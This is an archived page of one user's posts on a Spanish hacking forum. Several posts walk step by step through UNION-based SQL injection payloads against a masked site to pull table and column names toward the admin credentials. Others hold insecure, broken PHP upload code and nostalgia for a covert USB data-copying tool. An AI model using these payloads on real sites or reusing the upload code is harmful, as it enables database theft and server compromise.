últimos mensajes de: WiseHidden - Página 4

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

1 Mayo 2024, 18:26 pm

Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020

Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ... 23

31	Seguridad Informática / Nivel Web / Re: Vulnerabilidad URL SQL Injection	en: 28 Septiembre 2012, 13:52 pm
Resultados de la Tabla 2: Citar CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_ SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT, INDEX_STATISTICS,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES, SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS, TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS ,VIEWS,INNODB_IO_PATTERN,INNODB_RSEG,ProcessSettings,about,admincms,application ,banner,banner2,brochure,careerHP,careers,categories,committees,contact,events, expert,expert_content,hp_feature,ifra,join_rifm,kfm_directories, kfm_files,kfm_files_images,kfm_files_images_thumbs,kfm_parameters,kfm_session, kfm_session_vars,kfm_tagged_files, kfm_tags,links,member_directory,member_list,members,members_hp,news,photos, photos_cat,posters,press,presskit,pub_brochures,pub_feature,pub_reports, publications,publications_cat,publications_hp,reach,reach_cat,rexpan, science,scienceContent,sciencecat,scienceinfo,video,vision 3 Resultado Tabla 3 Citar 2 CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_ SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT, INDEX_STATISTICS,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES, SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS, TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS ,VIEWS,INNODB_IO_PATTERN,INNODB_RSEG,ProcessSettings,about,admincms,application ,banner,banner2,brochure,careerHP,careers,categories,committees,contact,events, expert,expert_content,hp_feature,ifra,join_rifm,kfm_directories, kfm_files,kfm_files_images,kfm_files_images_thumbs,kfm_parameters,kfm_session, kfm_session_vars,kfm_tagged_files, kfm_tags,links,member_directory,member_list,members,members_hp,news,photos, photos_cat,posters,press,presskit,pub_brochures,pub_feature,pub_reports, publications,publications_cat,publications_hp,reach,reach_cat,rexpan, science,scienceContent,sciencecat,scienceinfo,video,vision Y en las dos realizo el mismo código y en la 2 me aparace un (3) y en la 3 me aparace un (2) Pude ser que no haya descifrado el administrador bien? * Es muy cantoso ver el administrador, para ponerlo a prueba intenten saber cual es. - Se que estoy al último paso de hacerlo, pero me quedado estancado. Os pondré paso a paso mi ataque para ver si he cometido algún error en el proceso. Paso 1: Me dirigo al navegador (En este caso Firefox) - Espero que esto no influya en el ataque. Paso 2: Escribo la url de mi web y le inyecto un código para averiguar las tablas. www.xxxxxxx.com/publications-details.php?id=-1+union+select+1,-- (Voy agregando números de menor a mayor consecutivamente hasta que me sale la página de tablas) en este caso llegé hasta el 12. Citar www.xxxxxxx.com/publications-details.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12 Y en la pantalla me muestra un 2 (Marcado en azul) y un 3 separado por un ("Intro") Paso 3: Con esta información pruebo a inyectarle de nuevo otro código agregandole lo siguiente: Citar www.xxxxxxx.com/publications-details.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12+from+information_schema.tables Dandome la pantalla como resultado el siguiente contenido: Citar CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT,INDEX_STATISTICS,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS,VIEWS,INNODB_IO_PATTERN,INNODB_RSEG,ProcessSettings,about,admincms,application,banner,banner2,brochure,careerHP,careers,categories,committees,contact,events,expert,expert_content,hp_feature,ifra,join_rifm,kfm_directories,kfm_files,kfm_files_images,kfm_files_images_thumbs,kfm_parameters,kfm_session,kfm_session_vars,kfm_tagged_files,kfm_tags,links,member_directory,member_list,members,members_hp,news,photos,photos_cat,posters,press,presskit,pub_brochures,pub_feature,pub_reports,publications,publications_cat,publications_hp,reach,reach_cat,rexpan,science,scienceContent,sciencecat,scienceinfo,video,vision 3 Paso 4: Busco el nombre de adminitrador, y en caso de no saberlo busco algo referente a admi, admin, ect.... Para saber a cuál corresponde o tener una cierta referencia. Paso 5: Una vez tengamos el nombre me dirigo a una web donde te permita convertir cualquier palabra a ASCCI (Puede que aqui resida el fallo pues no se si se debe pasar exactamente a ASCII o a Hexadecimal) Yo me arriesgé con ASCII que es la que creo que sería. Dandome el siguiente resultado: Citar 117 110 100 101 102 105 110 101 100 Paso 6: Le quito todos los espacios al resultado ASCII y lo sustituyo por una coma. Quedando tal así: Citar 117,110,100,101,102,105,110,101,100 Paso 7: Teniendo estos resultados vuelvo a inyectar otro código más sustituyendo en el group_concat(table_name) por group_concat(column_name) y sustituyendo _schema.table por _schema.columns agregando ademas el siguiente código: Citar www.xxxxxxx.com/publications-details.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+ where+table_name=char (117,110,100,101,102,105,110,101,100) Y aquí cuando imagino que te debería dar los resultados que buscamos (Es decir los privilegios de nombre de administrador y su contraseña) Viendo que no era así probé a realizar el mismo proceso sustituyendo la tabla 2 por la 3 Y obtengo el mismo resultado. Asi que estaré haciendo algún paso mal. Por eso he puesto paso por paso una pequeña guía de mi proceso. Haber si alguien pudiera ver mi tropiezo. Gracias por vuestra ayuda y orientación. Un cordial saludo Atentamente WiseHidden

32	Seguridad Informática / Nivel Web / Re: Vulnerabilidad URL SQL Injection	en: 27 Septiembre 2012, 13:27 pm
71 visitas y nadie a podido aportar algo Valla si que ha cambiado este foro, donde antes todo el mundo ayudaba cordialmente en las dudas de otros, yo mismo he participado en muchos temas orientando y aportando lo poquito que supiese. Pero los ultimos 3 post q he escrito no he obtenido ni una respuesta.... Buenoooo pues nada a seguir probando e investigando por mi cuenta. Un saludo a todos Atentamente WiseHidden

33	Seguridad Informática / Nivel Web / Vulnerabilidad URL SQL Injection	en: 26 Septiembre 2012, 00:15 am
Muy buenas a todos. Hace poco termine mi página web, y por seguridad escaneé para ver si encontraba alguna vulnerabilidad para poder protegerla mejor. Al escanearla con el Famoso WebCruiser encontré una vulnerabilidad. (URL SQL INJECTION) Preocupado por dicha vulnerabilidad empecé a investigar como solventar el susodicho fallo. Y me atreví a ponerla a prueba le inyecté un código para sacar el nombre de las tablas, una vez encontrada dichas tablas busqué lo que debia ser el adminitrador (Q porsupuesto sabia el nombre de tal) y de paso me di cuenta lo visible que era jaja cuestion, despues de obtener el nombre de administrador lo converti a ASCCI y lo inserté en la inyección del código, y he aquí la duda. Despues de insertar todo el código, he aquí el mismo: Citar http://www.xxxxxxxx.com/publications-details.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=char (28117,110,100,101,102,105,110,101,100) me aparece solamente un 3. Quizás pudiera guiarme o esclarecerme un poco mi duda, pues ya que conozco dicha vulnerabilidad me gustaría poder solventarla. Muchisimas gracias de antemano Atentamente WiseHidden

34	Programación / PHP / Re: Problema al generar Código php para subir archivos a mi FTP	en: 24 Septiembre 2012, 22:39 pm
Muy buenas EFEX. Citar Estas seguro que es la carpeta correcta? move_uploaded_file() no creara la carpeta en caso de que no exista. Pues la verdad no he creado ninguna carpeta lo único que subí al ftp fueron los dos .php (upload.php y subirF.php) Quizás ahi resida el problema, es lo primero que probaré. Citar Verifica tambien post_max_size en php.ini. Aquí me he perdido ¿Como lo verifico? Citar Sobre la seguridad... utilizando la libreria GD, crea una nueva imagen, si esta no puede ser creada quiere decir que no era una imagen gif, jpeg, png, etc. valida. Código $nuevaImg = @imagecreatefromjpeg($_FILES['file']['tmp_name']); if (!$nuevaImg) { //La imagen no pudo ser creada por lo tanto //no es una imagen jpeg valida }else{ // Destruimos la imagen creada, ya no es necesaria imagedestroy($nuevaImg); //Procedemos a subir el archivo.... } Insertaré el código asi quedaría correcto o donde lo incrustaria?: Citar <?php $nombre_archivo = $_FILES['archivo'] ['name']; $tipo_archivo = $FILES['archivo'] ['type']; $tamano_archivo = $_FILES['archivo'] ['size']; $temp_archivo = $_FILES['archivo'] ['tmp_name']; if ( strpos($tipo_archivo, "gif") \|\| strpos($tipo_archivo, "jpeg") && $tamano_archivo < 1000000 ) move_uploaded_file($temp_archivo), "../Descargas/".$nombre_archivo) ) $nuevaImg = @imagecreatefromjpeg($_FILES['file']['tmp_name']); if (!$nuevaImg) { //La imagen no pudo ser creada por lo tanto //no es una imagen jpeg valida }else{ // Destruimos la imagen creada, ya no es necesaria imagedestroy($nuevaImg); //Procedemos a subir el archivo... { echo "Archivo Subido Correctamente"; } else (echo "Error al Subir Archivo";} } else echo"Tu archivo no cumple con las restricciones"; ?> ?> Es un mundo nuevo y grande ala vez que interesante esto del .php pero veo que aún no he hecho mas que intentar gatear, me está gustando mucho este lenguaje, tiene tanto potencial. Mil gracias por toda vuestra orientación, no se que hariamos la gente que quiere aprender sin este increible foro que tanto me ha enseñado. Un gran saludo a todos camaradas. WiseHidden.

35	Seguridad Informática / Hacking / Re: USB (Copiador de Datos de la Pc)	en: 24 Septiembre 2012, 22:28 pm
Muy buenas Futurehack. Que recuerdos al ver este post!! Recuerdo mi curiosidad en este campo concretamente, me vino muy bien como herramienta de trabajo. Y recuerdo e incluso hacerle algunas mejoras, lastima que megaupload fuese cerrado tenia mi código guardado a buen recaudo (O eso creia) Respecto atu pregunta este programa recuerdo que era bastante útil para recopilar muchisima información y privilegios del pc. Aunque imagino que para "extraer" info de un usb diferente imagino que antes debería de estar conectado al susodicho equipo. Y probar suerte, aunque quizas debas de cambiar la ruta para que visualice el usb. Lastima que no cuente ya con el código para probarlo. Quizás MrDJcKMC fuera tan amable de tomarse la molestia de encontrar ese script y mostrarnoslo de nuevo y nadie mejor que el para explicarnos y resolvernos tu duda. Suerte compañero Cualquier otra cosa que pudiera ayudarte hazmelo saber Un cordial saludo Atentamente WiseHidden

36	Programación / PHP / Re: Problema al generar Código php para subir archivos a mi FTP	en: 24 Septiembre 2012, 15:48 pm
He estado probando a resolverlo por mi cuenta, pero ahora estoy aún mas perdido. Alguien podria orientarme?? Se lo agradeceria enormemente. Un saludo. PD: Una vez tenga resuelto todas las dudas, pues ya he empezado a hacer las primeras pruebas con el tema de registro de usuarios y reconomiento del mismo. Haré un pequeño manual paso a paso y explicado de la manera mas sencilla de entender para todo aquel que le pudiera servir de ayuda. Un saludo a todos Atentamente WiseHidden

37	Programación / PHP / Re: Problema al generar Código php para subir archivos a mi FTP	en: 23 Septiembre 2012, 20:23 pm
Muy buenas WarGhost antes de nada gracias por tu respuesta. Referente alo de filtrar los ficheros es una gran idea. Pero ando muy muy pero que muy recien empezado en esto de php. Siempre he trabajado en html (Pero ya sabeis lo limitado que es comparado con el .php) Mi idea final, seria añadirle las siguientes mejoras, pero soy consciente de que tengo que hacerlo poco a poco. * Registro de usuario y login (Con un listado de sus ficheros subidos) * Filtrar y analizar los ficheros * Crear una url de cada fichero subido para poder compartirlo * y algunas mejoras más Pero el primer paso seria solucionar los dos temas que respectan. ¿Como podria filtrar los ficheros y utilizar la libreria GB para evitar que me inyecten el código? Lo de filtrar las extensiones es mejor quitarlo asi no me limitare a estas extensiones solo, ¿para utilizar strrchr que tendria que sustituirlo por strposm o tendria que dictarle otra función? Disculpen mi ignorancia. Un saludo WH

38	Programación / PHP / Problema al generar Código php para subir archivos a mi FTP	en: 23 Septiembre 2012, 19:00 pm
Muy buenas a todos. Estoy haciendo una mejora en mi web, donde los visitantes pueden subir archivos adjuntos, tal como imagenes, texto, videos, etc.... Puesto que estoy empezando en esto del php he creado dos códigos muy simples que iré mejorando poco a poco el problema es que el "upload.php" se ve perfectamente desde la web de prueba, pero ala hora de enviar el archivo, y se direcciona a SubirF.php (La página se queda en blanco) y no me confirma si se ha podido o no enviar el archivo, otro problema es que en el FTP no sale ningun archivo, ya no se si es debido a que no se ha enviado o a que tengo que crear alguna carpeta aparte. Os adjunto los dos códigos por si vieran algún fallo pudieran guiarme. CÓDIGO UPLOAD.PHP Citar <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Prueba Subir Archivo a FTP</title> </head> <form method="post" action="subirF.php" enctype="multipart/form-data"> <input name = "archivo" type ="file" /> <br /> <input type = "submit" value="Enviar archivo" /> </form> <body> </body> </html> CÓDIGO SUBIRF.PHP Citar <?php $nombre_archivo = $_FILES['archivo'] ['name']; $tipo_archivo = $FILES['archivo'] ['type']; $tamano_archivo = $_FILES['archivo'] ['size']; $temp_archivo = $_FILES['archivo'] ['tmp_name']; if ( strpos($tipo_archivo, "gif") \|\| strpos($tipo_archivo, "jpeg") && $tamano_archivo < 1000000 ) move_uploaded_file($temp_archivo), "../Descargas/".$nombre_archivo) ) { echo "Archivo Subido Correctamente"; } else (echo "Error al Subir Archivo";} } else echo"Tu archivo no cumple con las restricciones"; ?> Un saludo y gracias Espero que a cualquier interesado pueda servirle de ayuda también Atentamente WH

39	Programación / Programación C/C++ / Re: Duda con Programa (Calcula el % de interes de un préstamo)	en: 2 Agosto 2012, 10:54 am
Citar De verdad que no entendi que es lo que quieres, y lo lei bastante, o soy pesimo para la contabilidad o me volvi retrasado mental y me quede corto con la redacción. Seguramente no me expresé del todo bien. Citar No le veo mucho sentido mostrar numerado 3 veces que debe pagar $35, bastaría hacer el cálculo e informar: "Ud. debe pagar N cuotas de $xx.xx debiendo un total de $xx.xx". Puesto que el "proyecto" era principalmente para aprender quizas no desarrollé bien la finalidad a seguir, pero quizás lleves razón en no mostrar el monto 3 veces, y solamente muestre el total, y que diera como resultado el pago que corresponderia mensualmente aparte (Una sola vez) Citar Ejemplo: Prestamo 100€ al 5% en 3 Meses Meses Pago Total con Interes Pago Mensual 3 105 35€ La idea es que se refleje la cantidad de meses + Total del pago con intereses + la cantidad a pagar mensualmente. Citar Si lo que buscas es obtener el interés acumulado o interés compuesto (no soy muy docto en el tema así que disculpas por los términos), creo que podrías hacer algo por el estilo: He probado tu código pero me da error en la linea 28 Citar cout << setprecision(2) << fixed; tengo que nombrar antes la variable? (aun estoy verdecillo en la programación) Mil gracias a los dos por vuestra ayuda y orientación un saludo Att. WH

40	Programación / Programación C/C++ / Duda con Programa (Calcula el % de interes de un préstamo)	en: 1 Agosto 2012, 20:37 pm
Muy buenas a todos. Estoy haciendo un programilla (Para aprender principalmente) que trata sobre lo que podria ser un programa que calcula el % de Interés de un préstamo solicitado. Pero tengo varias dudas. 1. Me calcula los intereses del total del monto anterior, lo cuál no saldrian las matematicas, me gustaria saber como realizarlo en total y que al igual que en el ejmplo se "especifique" el total del mes anterior sin aplicarselo al total. (Es decir que me calcule el total del intereses y me lo especifique mes a mes) Ejemplo: Prestamo 100€ al 5% en 3 Meses Meses Monto a pagar mensualmente 1 35 2 35 3 35 Total: 105 3. Aunque esto es un poco mas complejo me gustaria ampliar un poco el programa con una base de registro de clientes, datos, ect.... (Aunque esto puede ser un poco mas adelante) Os adjunto el código Citar #include<iostream> #include<cmath> using namespace std; int main() { float tasa; float monto_introducido; float monto_final; int meses; cout << "Calcular el monto acumulado en una cuenta durante 'X' anos" << endl; cout << "basandose en los intereses que ofrece un banco." << endl; cout << endl; cout << "Escriba el monto de dinero introducido: "; cin >> monto_introducido; cout << endl; cout << "Escriba la tasa de interes que le ofrece el banco (sin el %): "; cin >> tasa; cout << endl; tasa = tasa / 100; cout << "Escriba el numero de meses que el dinero permanece en el banco: "; cin >> meses; cout << endl; cout << "\tmeses\t\tMonto" << endl; for ( int meses_final = 1; meses_final <= meses; meses_final++) { monto_final = monto_introducido * pow ( 1.0 + tasa, meses_final); cout << "\t" << meses_final << "\t\t" << monto_final << endl; } cout << endl; system("pause"); return 0; } Muchas gracias Atentamente WiseHidden

Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ... 23

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines